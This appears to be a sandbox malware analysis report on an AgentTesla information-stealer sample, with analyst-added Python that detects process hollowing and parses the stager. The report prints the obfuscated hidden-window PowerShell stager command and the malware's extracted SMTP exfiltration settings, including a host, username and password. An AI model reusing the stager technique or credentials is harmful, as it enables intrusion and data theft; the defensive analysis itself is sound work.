Analysis
max time kernel: 142s
max time network: 151s
platform: windows7_x64
resource: win7-20240704-en
resource tags: arch:x64, arch:x86, image:win7-20240704-en, locale:en-us, os:windows7-x64, system
submitted: 02/08/2024, 02:10
Static task: static1
Behavioral task: behavioral1
Sample: a040ff5358e881adf59b8446ebdbb987a486c4fe90e2f1d64a5b9abadd550fd9.exe
Resource: win7-20240704-en
General
Target: a040ff5358e881adf59b8446ebdbb987a486c4fe90e2f1d64a5b9abadd550fd9.exe
Size: 593KB
MD5: ca61c16bb94540662facaa6cf7f317f8
SHA1: 6fd5af916972136da2bcefb6188d1c11c905ed41
SHA256: a040ff5358e881adf59b8446ebdbb987a486c4fe90e2f1d64a5b9abadd550fd9
SHA512: a41ebbe793b3d234921656b6ef3df75e500bb115ce3788e1bb4bc57ebda2de0dcbcdea24b51b53d8343e3b60977d2a57c577aef03613694d2c0a7346bac6eb5f
SSDEEP: 12288:1oGrkCEw+Is4l8O3d5Gu8y5pSqgsZsFKSB82MiEhB:1oGI3w1l8Ot5Gvy5DKEdB
Malware Config
Extracted
agenttesla
Protocol: smtp
Host: mmppf.com
Port: 587
Username: [email protected]
Password: Riy@Saudi#2030
Email To: [email protected]
Signatures

AgentTesla
Agent Tesla is a remote access tool (RAT) and information stealer written in .NET (originally Visual Basic).

Credentials from Password Stores: Credentials from Web Browsers 1 TTPs
Malicious access to, or copying of, web browser credential stores.

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Runs PowerShell with its display window hidden (-windowstyle hidden).
pid    Process
576    powershell.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow   ioc
5      drive.google.com
3      drive.google.com

Drops file in System32 directory 5 IoCs
description                    ioc                                  Process
File opened for modification   C:\Windows\SysWOW64\Pentose.lnk      a040ff5358e881adf59b8446ebdbb987a486c4fe90e2f1d64a5b9abadd550fd9.exe
File opened for modification   C:\Windows\SysWOW64\playgoers.sep    a040ff5358e881adf59b8446ebdbb987a486c4fe90e2f1d64a5b9abadd550fd9.exe
File created                   C:\Windows\SysWOW64\bores.lnk        a040ff5358e881adf59b8446ebdbb987a486c4fe90e2f1d64a5b9abadd550fd9.exe
File opened for modification   C:\Windows\SysWOW64\bores.lnk        a040ff5358e881adf59b8446ebdbb987a486c4fe90e2f1d64a5b9abadd550fd9.exe
File created                   C:\Windows\SysWOW64\Pentose.lnk      a040ff5358e881adf59b8446ebdbb987a486c4fe90e2f1d64a5b9abadd550fd9.exe

Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
pid    Process
2808   wab.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
pid    Process
576    powershell.exe
2808   wab.exe

Suspicious use of SetThreadContext 1 IoCs
description                          pid   Process          procid_target
PID 576 set thread context of 2808   576   powershell.exe   34

Drops file in Program Files directory 4 IoCs
description                    ioc                                                                         Process
File opened for modification   C:\Program Files (x86)\Common Files\Vaginismus.ini                          a040ff5358e881adf59b8446ebdbb987a486c4fe90e2f1d64a5b9abadd550fd9.exe
File opened for modification   C:\Program Files (x86)\Common Files\nvningedomstol\arbejdskommando.sto      a040ff5358e881adf59b8446ebdbb987a486c4fe90e2f1d64a5b9abadd550fd9.exe
File opened for modification   C:\Program Files (x86)\Common Files\Pygopagus172\matthfus.ala               a040ff5358e881adf59b8446ebdbb987a486c4fe90e2f1d64a5b9abadd550fd9.exe
File opened for modification   C:\Program Files (x86)\Common Files\lnstigningsmnstre\Ccny.sta              a040ff5358e881adf59b8446ebdbb987a486c4fe90e2f1d64a5b9abadd550fd9.exe

Drops file in Windows directory 4 IoCs
description                    ioc                                                Process
File opened for modification   C:\Windows\resources\0409\ejerlst.uns              a040ff5358e881adf59b8446ebdbb987a486c4fe90e2f1d64a5b9abadd550fd9.exe
File opened for modification   C:\Windows\resources\fysiurg\Cheesecutter.ini      a040ff5358e881adf59b8446ebdbb987a486c4fe90e2f1d64a5b9abadd550fd9.exe
File opened for modification   C:\Windows\yer.ini                                 a040ff5358e881adf59b8446ebdbb987a486c4fe90e2f1d64a5b9abadd550fd9.exe
File opened for modification   C:\Windows\truthlessly\Stablish.ini                a040ff5358e881adf59b8446ebdbb987a486c4fe90e2f1d64a5b9abadd550fd9.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Location Discovery: System Language Discovery 1 TTPs 4 IoCs
Attempts to gather information about the system language of the victim in order to infer the geographical location of that host.
description   ioc                                                           Process
Key opened    \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language   wab.exe
Key opened    \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language   a040ff5358e881adf59b8446ebdbb987a486c4fe90e2f1d64a5b9abadd550fd9.exe
Key opened    \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language   powershell.exe
Key opened    \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language   cmd.exe

Suspicious behavior: EnumeratesProcesses 8 IoCs
pid    Process
576    powershell.exe
576    powershell.exe
576    powershell.exe
576    powershell.exe
576    powershell.exe
576    powershell.exe
2808   wab.exe
2808   wab.exe

Suspicious behavior: MapViewOfSection 1 IoCs
pid    Process
576    powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs
description               pid    Process
Token: SeDebugPrivilege   576    powershell.exe
Token: SeDebugPrivilege   2808   wab.exe

Suspicious use of SetWindowsHookEx 1 IoCs
pid    Process
2808   wab.exe

Suspicious use of WriteProcessMemory 14 IoCs
description                        pid    Process                                                                 procid_target
PID 2700 wrote to memory of 576    2700   a040ff5358e881adf59b8446ebdbb987a486c4fe90e2f1d64a5b9abadd550fd9.exe   30
PID 2700 wrote to memory of 576    2700   a040ff5358e881adf59b8446ebdbb987a486c4fe90e2f1d64a5b9abadd550fd9.exe   30
PID 2700 wrote to memory of 576    2700   a040ff5358e881adf59b8446ebdbb987a486c4fe90e2f1d64a5b9abadd550fd9.exe   30
PID 2700 wrote to memory of 576    2700   a040ff5358e881adf59b8446ebdbb987a486c4fe90e2f1d64a5b9abadd550fd9.exe   30
PID 576 wrote to memory of 1788    576    powershell.exe                                                          32
PID 576 wrote to memory of 1788    576    powershell.exe                                                          32
PID 576 wrote to memory of 1788    576    powershell.exe                                                          32
PID 576 wrote to memory of 1788    576    powershell.exe                                                          32
PID 576 wrote to memory of 2808    576    powershell.exe                                                          34
PID 576 wrote to memory of 2808    576    powershell.exe                                                          34
PID 576 wrote to memory of 2808    576    powershell.exe                                                          34
PID 576 wrote to memory of 2808    576    powershell.exe                                                          34
PID 576 wrote to memory of 2808    576    powershell.exe                                                          34
PID 576 wrote to memory of 2808    576    powershell.exe                                                          34
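The per-API rows above only become meaningful once they are correlated: PID 576 (powershell.exe) writes into PID 2808 (wab.exe) six times and then sets a thread context in it, while wab.exe starts calling the HideFromDebugger variants itself. The following Python is an added example of that correlation, not Triage's own detection logic and not code from the sample. The event records are constructed by hand from the PID / Process / procid_target columns shown above; the record layout and the threshold (WriteProcessMemory plus SetThreadContext from one source on one target) are my own.

```python
"""Correlate per-API sandbox signature rows into a process-injection finding.

Added example for this report; not Triage's detection logic and not part of
the sample. Events are constructed from the signature tables in the report.
"""
from collections import defaultdict
from dataclasses import dataclass
from typing import Optional

SAMPLE = "a040ff5358e881adf59b8446ebdbb987a486c4fe90e2f1d64a5b9abadd550fd9.exe"

# PID -> image path, as listed in the report's process tree.
PROCESS_PATHS = {
    2700: r"C:\Users\Admin\AppData\Local\Temp" + "\\" + SAMPLE,
    576: r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
    1788: r"C:\Windows\SysWOW64\cmd.exe",
    2808: r"C:\Program Files (x86)\windows mail\wab.exe",
}


@dataclass(frozen=True)
class ApiEvent:
    api: str                      # e.g. "WriteProcessMemory"
    pid: int                      # acting process
    target: Optional[int] = None  # PID acted upon, when the API takes one


# CONSTRUCTED from the report's rows; repeated rows are kept because each one
# is a separate call in the trace.
EVENTS = (
    [ApiEvent("WriteProcessMemory", 2700, 576)] * 4
    + [ApiEvent("WriteProcessMemory", 576, 1788)] * 4
    + [ApiEvent("WriteProcessMemory", 576, 2808)] * 6
    + [
        ApiEvent("SetThreadContext", 576, 2808),
        ApiEvent("MapViewOfSection", 576),
        ApiEvent("NtSetInformationThreadHideFromDebugger", 576),
        ApiEvent("NtSetInformationThreadHideFromDebugger", 2808),
        ApiEvent("NtCreateThreadExHideFromDebugger", 2808),
        ApiEvent("AdjustPrivilegeToken:SeDebugPrivilege", 576),
        ApiEvent("AdjustPrivilegeToken:SeDebugPrivilege", 2808),
    ]
)


def find_injection_chains(events, paths):
    """Return one finding per (source, target) pair where the source both wrote
    the target's memory and replaced a thread context in it.

    A parent writing into a child it has just created is routine (CreateProcess
    does it for the startup parameters), so WriteProcessMemory alone is weak
    evidence: the 2700 -> 576 rows are not reported. Paired with SetThreadContext
    on the same target it is the classic hollowing sequence.
    """
    apis_by_pair = defaultdict(set)
    apis_by_pid = defaultdict(set)
    for e in events:
        apis_by_pid[e.pid].add(e.api)
        if e.target is not None:
            apis_by_pair[(e.pid, e.target)].add(e.api)

    findings = []
    for (src, dst), apis in sorted(apis_by_pair.items()):
        if not {"WriteProcessMemory", "SetThreadContext"} <= apis:
            continue
        reasons = ["WriteProcessMemory + SetThreadContext on the same target"]
        dst_path = paths.get(dst, "")
        if dst_path.lower().startswith((r"c:\program files", r"c:\windows")):
            reasons.append("target is a Microsoft binary under a system path: " + dst_path)
        if "MapViewOfSection" in apis_by_pid[src]:
            reasons.append("source also mapped a section (payload staging)")
        if any(a.endswith("HideFromDebugger") for a in apis_by_pid[dst]):
            reasons.append("target shows anti-debug calls of its own (injected code is active)")
        findings.append({"source": src, "target": dst, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in find_injection_chains(EVENTS, PROCESS_PATHS):
        print(f"{f['source']} -> {f['target']}")
        for r in f["reasons"]:
            print("   ", r)
```

Run against the constructed events this yields a single finding, 576 -> 2808, with all four reasons; the fourteen WriteProcessMemory rows on their own would have produced three noisy pairs. The same rule ports directly to Sysmon event 8/10 or ETW data, where the source/target PIDs are explicit fields.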
Processes

C:\Users\Admin\AppData\Local\Temp\a040ff5358e881adf59b8446ebdbb987a486c4fe90e2f1d64a5b9abadd550fd9.exe  (PID 2700)
  Command line: "C:\Users\Admin\AppData\Local\Temp\a040ff5358e881adf59b8446ebdbb987a486c4fe90e2f1d64a5b9abadd550fd9.exe"
  - Drops file in System32 directory
  - Drops file in Program Files directory
  - Drops file in Windows directory
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory

  └─ C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  (PID 576)
       Command line: "powershell.exe" -windowstyle hidden "$Undiaphanousness=Get-Content 'C:\Users\Admin\AppData\Local\Temp\fingerstningerne\flagellulae\Rouilles\Effektiviseret.Dia';$Trafikflyene=$Undiaphanousness.SubString(51750,3);.$Trafikflyene($Undiaphanousness)"
       - Command and Scripting Interpreter: PowerShell
       - Suspicious use of NtSetInformationThreadHideFromDebugger
       - Suspicious use of SetThreadContext
       - System Location Discovery: System Language Discovery
       - Suspicious behavior: EnumeratesProcesses
       - Suspicious behavior: MapViewOfSection
       - Suspicious use of AdjustPrivilegeToken
       - Suspicious use of WriteProcessMemory

       └─ C:\Windows\SysWOW64\cmd.exe  (PID 1788)
            Command line: "C:\Windows\system32\cmd.exe" "/c set /A 1^^0"
            - System Location Discovery: System Language Discovery

       └─ C:\Program Files (x86)\windows mail\wab.exe  (PID 2808)
            Command line: "C:\Program Files (x86)\windows mail\wab.exe"
            - Suspicious use of NtCreateThreadExHideFromDebugger
            - Suspicious use of NtSetInformationThreadHideFromDebugger
            - System Location Discovery: System Language Discovery
            - Suspicious behavior: EnumeratesProcesses
            - Suspicious use of AdjustPrivilegeToken
            - Suspicious use of SetWindowsHookEx
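The powershell.exe command line in the tree is the interesting artifact: it reads a dropped data file (Effektiviseret.Dia), carves three characters out of it at offset 51750, and dot-invokes whatever those three characters name, passing the whole file content as the argument. No cmdlet, alias or keyword appears on the command line itself, which is what defeats command-line pattern matching. The Python below is an added example that dissects that command line and emulates the SubString step; it is not part of the report or of the sample. The command line is copied from the report. The contents of Effektiviseret.Dia are not on this page, so the blob built here is constructed filler with an arbitrary three-letter token placed at the referenced offset purely to show the mechanism; the real token is unknown.

```python
"""Dissect the obfuscated PowerShell stager command line from the process tree.

Added example; not part of the report or the sample. CMDLINE is copied from the
report. The payload blob is CONSTRUCTED: the real file is not available here.
"""
import re

CMDLINE = (
    r'"powershell.exe" -windowstyle hidden "$Undiaphanousness=Get-Content '
    r"'C:\Users\Admin\AppData\Local\Temp\fingerstningerne\flagellulae\Rouilles\Effektiviseret.Dia';"
    r'$Trafikflyene=$Undiaphanousness.SubString(51750,3);.$Trafikflyene($Undiaphanousness)"'
)

# Shape: $a=Get-Content '<path>'; $b=$a.SubString(<off>,<len>); .$b($a)
STAGER_RE = re.compile(
    r"\$(?P<content_var>\w+)=Get-Content\s+'(?P<path>[^']+)'"            # read payload file
    r".*?\$(?P<verb_var>\w+)=\$(?P=content_var)\.SubString\((?P<offset>\d+),(?P<length>\d+)\)"  # carve command name
    r".*?\.\$(?P=verb_var)\(\$(?P=content_var)\)",                       # dot-invoke it with the blob as argument
    re.S,
)


def parse_stager(cmdline: str) -> dict:
    """Pull the payload path, the (offset, length) of the hidden command name
    and the window-hiding flag out of the stager command line."""
    m = STAGER_RE.search(cmdline)
    if m is None:
        raise ValueError("command line does not match the Get-Content/SubString stager shape")
    return {
        "payload_path": m.group("path"),
        "offset": int(m.group("offset")),
        "length": int(m.group("length")),
        "hidden_window": "-windowstyle hidden" in cmdline.lower(),
    }


def recover_command_name(blob: str, offset: int, length: int) -> str:
    """Emulate $blob.SubString(offset, length). The name of the command the
    stager runs lives inside the payload, so only the payload file (or a
    script-block log of what actually executed) reveals it."""
    if offset + length > len(blob):
        raise ValueError("offset beyond end of payload (truncated or wrong file)")
    return blob[offset:offset + length]


def build_constructed_blob(offset: int, token: str, size: int) -> str:
    """CONSTRUCTED stand-in for Effektiviseret.Dia: one long line of filler with
    `token` written at `offset`. One line matters: Get-Content without -Raw
    returns one string per line, and .SubString applied to an array of lines
    would not give the stager a single command name."""
    if offset + len(token) > size:
        raise ValueError("blob too small for the requested offset")
    return "A" * offset + token + "A" * (size - offset - len(token))


if __name__ == "__main__":
    info = parse_stager(CMDLINE)
    # "iex" is an assumed token for demonstration only; the real value is unknown.
    blob = build_constructed_blob(info["offset"], "iex", 60000)
    print(info)
    print("command name carved from payload:", recover_command_name(blob, info["offset"], info["length"]))
```

In triage, the useful outputs are the payload path (the file to pull from the dropped-files list) and the offset, which tells you where in that file to look first. Because the dot operator runs the carved name with the entire file content as its argument, the same file is both the carrier of the verb and the script that gets executed, so PowerShell script-block logging (event 4104) rather than process-creation logging is where the de-obfuscated second stage would appear.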
Network
MITRE ATT&CK Enterprise v15
Downloads

Filesize: 50KB
MD5: fd91c54cfd0dc5ffb898c8c6f497eb88
SHA1: c4ffcd13c0a7e9bf4811c19d969cdd6adae83926
SHA256: d947ac7f9b2519129e2352c38fef03524c8ea3abfccc968cee8fad3539508cd1
SHA512: 7075cd28627540323a1212f677b4a8bff6945960e2ff71d6bcd4f4ea68db625b51017c9841fd1db06f156e327fcdc647391ae7d30af3a4fe60dd3be4083b0616

Filesize: 318KB
MD5: 33bcb10fedd219077c00de12d43139cd
SHA1: 92090f81150635c2142d09cae191d01c7ff79e0a
SHA256: 67e412a4be377c5fa0e6d565b0774353e6588f6cd3bbd5774c3d51b0ee20a7a3
SHA512: 07a6c983e2973743fc6fb86a89d6b649d05436f4c4e6321218c6122eb99afcb9d41a6a53b27f4d2a962ea1b0d9363e0f6811013d7530d3099063f1630466e16a

Filesize: 1KB
MD5: 364cf955961bb6ef65ef9a0c55cb2b6d
SHA1: c9eaa40fa7c5a13f48625275c46fc56d1729dddd
SHA256: d868d3e0442ede82e84788663391065460b2605fa71e4b03454bdc35cc7e2c26
SHA512: 678731a61614a6ebdfe192f3d87ad398458891afcf295361968862209c70d2486d9e3c3e979b2f4e2948bb51fa08dbe4152c5c681843936290bb74dc133bc02d

Filesize: 38B
MD5: e58f8a2dcf15a626bc785906a24d269a
SHA1: 451f8692070432dbd0232c61631cb49874323fd7
SHA256: 39b313e3f6e503de2657691e96235891834d12dab42957e62aea1c588c35bc83
SHA512: 7c33aec2758c72eb727f156ca5946626409a1b2ad22a980801436acacac1bf05eac231a2a0cc2858d369a54cbfa3cafdbd449ce696bf6c8fcecfb53699a75bd3